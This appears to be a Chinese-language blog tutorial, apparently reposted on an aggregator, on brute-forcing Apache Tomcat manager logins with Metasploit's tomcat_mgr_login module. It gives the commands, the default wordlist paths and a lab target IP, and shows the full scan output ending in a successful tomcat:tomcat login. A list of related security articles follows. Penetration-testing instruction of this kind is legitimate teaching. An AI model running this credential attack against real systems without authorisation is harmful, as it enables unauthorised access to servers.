2. 程式人生 > 其它 >安全測試18--滲透攻擊Tomcat服務

安全測試18--滲透攻擊Tomcat服務

阿新 發佈:2021-12-21

1、開啟msfconsole控制檯

msfconsole

2、搜尋有效的Tomcat模組

msf > search tomcat

這裡我們選擇使用模組auxiliary/scanner/http/tomcat_mgr_login

3.使用Tomcat管理登入模組進行滲透攻擊,執行命令如下:

msf6 > use auxiliary/scanner/http/tomcat_mgr_login

4,檢視tomcat_mgr_login模組有效選項,執行命令

msf auxiliary(scanner/http/tomcat_mgr_login) > show options

5.指定使用者名稱和密碼檔案,這裡使用預設路徑

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set
 
 pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

6.指定要攻擊的目標伺服器

msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

7.設定伺服器埠號為8180

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

8,執行滲透程式

msf auxiliary(scanner/http/tomcat_mgr_login) > exploit 

[!] No active DB -- Credential data will not be saved!
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

從結果中可以看到找到的賬號密碼為tomcat,tomcat

更多技術請關注微信公眾號:程式設計師技術前沿

相關推薦

安全測試18--滲透攻擊Tomcat服務

1、開啟msfconsole控制檯 msfconsole 2、搜尋有效的Tomcat模組 msf > search tomcat 這裡我們選擇使用模組auxiliary/scanner/http/tomcat_mgr_login

安全測試】DOS攻擊:ping攻擊

技術標籤:安全測試ping攻擊DOS攻擊 一、Ping攻擊介紹 Ping攻擊就是不斷向指定的IP地址傳送不接收回復的資料包,目標主機都需要耗費一定的系統資源進行應答回覆,這種攻擊通過傳送大於65536位元組的ICMP包使作業

記一次metasploitable2內網滲透之samba服務攻擊

80埠中對應一些web靶場,在這裡不記錄 111埠的利用是向rpcbind服務的UDP套接字傳送60位元組載荷,便可填充目標記憶體,搞崩主機系統。在這裡也不記錄

mysql5.7.18安裝時mysql服務啟動失敗的解決方法

MySQL 是一個非常強大的關係型資料庫。但有些初學者在安裝配置的時候,遇到種種的困難,在此就不說安裝過程了,說一下配置過程。在官網下載的mysql時候,有msi格式和zip格式。Msi直接執行安裝即可,zip則解壓在自己喜

Java synchronize執行緒安全測試

執行緒的執行是與當前CPU的資源排程與時間片是有關係的,當一個執行緒中的執行到某一部分方法的時候輪到另外一個執行緒來執行相應的程式碼,所以還沒有等到第一個執行緒執行完那麼CPU有切換到另外一個執行緒來執行其

Web安全之SQL注入攻擊技巧與防範(轉)

add by zhj: 作者總結了防止SQL的幾種辦法,終極辦法是資料庫(如MySQL)自身提供的預編譯功能,即先將SQL語句中的引數用?替換,發給資料庫進行預編譯,得到編譯結果後再傳入引數替換?,執行SQL。

c#監聽tomcat服務

https://blog.csdn.net/bornonew/article/details/68941510 在VS2008中建立一個web service專案。 建立兩個WebMethod。

對回形針paperclip站點的安全測試

前言 先簡單的介紹一下自己,Yunen,重慶大學大二信安在讀生,是回形針paperclip的粉絲,對網路安全方面感興趣,這次看到了回形針弄了自己的科普網站,打算利用自己的知識,給予回形針一點點小幫助:)

linux上部署docker+tomcat服務,並部署專案

前段時間專案要求在linux伺服器上用docker部署專案,搞負載均衡,因為前面學習過docker,所以查了很多資料,在這裡做一下筆記,備忘。

乾貨 | IAST安全測試如何防止資料汙染

作者簡介 Eric,攜程資深開發工程師,關注應用安全滲透測試方面的技術和相關開源產品的二次開發。

Burp Suite安全測試神器安裝以及配置

Burp Suite是一個整合化的滲透測試工具,它集合了多種滲透測試元件,使我們自動化地或手工地能更好的完成對web應用的滲透測試攻擊。在滲透測試中,我們使用Burp Suite將使得測試工作變得更加容易和方便,

MYSQL主從複製實現資料庫同步與keepalived實現Tomcat服務雙機熱備操作記錄

MYSQL資料庫叢集實戰   MYSQL 優化從以下幾個方向:高可用、主從複製、讀寫分離、拆分庫、拆分表來進行優化。

web安全測試---AppScan掃描工具

安全測試應該是測試中非常重要的一部分,但他常常最容易被忽視掉。   儘管國內經常出現各種安全事件,但沒有真正的引起人們的注意。不管是開發還是測試都不太關注產品的安全。當然,這也不能怪我們苦B的“民工兄弟

linux下啟動tomcat服務的命令是什麼

Linux下tomcat服務的啟動、關閉與錯誤跟蹤,使用PuTTy遠端連線到伺服器以後,通常通過以下幾種方式啟動關閉tomcat服務:切換到tomcat主目錄下的bin目錄(cd usr/local/tomcat/bin)1,啟動tomcat服務方式一:直接啟

利用chrome_remote_interface實現程式化、自動化Web安全測試

如果要問有哪些抓包神器或者流量分析工具?以下幾款工具是必須要提的,burpsuite(跨平臺)、fiddler(windows下抓包神器)、wireshark(經典網路抓包工具)、justniffer(與前面幾個使用代理獲取流量不一樣的是,ju

web安全測試總結、CTF入門總結

靜態資源伺服器漏洞 Apache伺服器從後向前解析檔案型別,直到解析到可處理的檔名為止

安全|常見的Web攻擊手段之CSRF攻擊

對於常規的Web攻擊手段,如XSS、CRSF、SQL注入、(常規的不包括檔案上傳漏洞、DDoS攻擊)等,防範措施相對來說比較容易,對症下藥即可,比如XSS的防範需要轉義掉輸入的尖括號,防止CRSF攻擊需要將cookie設定為http

軟體安全測試之SQL注入

安全測試之SQL注入 1、安全測試在專案整體流程中所處的位置 一般建議在整合測試前根據產品實現架構及安全需求,完成安全性測試需求分析和測試設計,準備好安全測試用例。在整合版本正式轉測試後,即可進行安全

tomcat啟動後訪問404_Linux安全加固之中介軟體Tomcat

技術標籤:tomcat啟動後訪問404tomcat啟動成功但是訪問方面都是404tomcat啟動日誌tomcat拒絕訪問是為什麼tomcat日誌檔案在哪tomcat本地訪問地址

安全隨筆之xss攻擊

XSS攻擊 什麼是xss攻擊 XSS攻擊通常指的是通過利用網頁開發時留下的漏洞,通過巧妙的方法注入惡意指令程式碼到網頁,使使用者載入並執行攻擊者惡意製造的網頁程式。這些惡意網頁程式通常是JavaScript,但實際上也可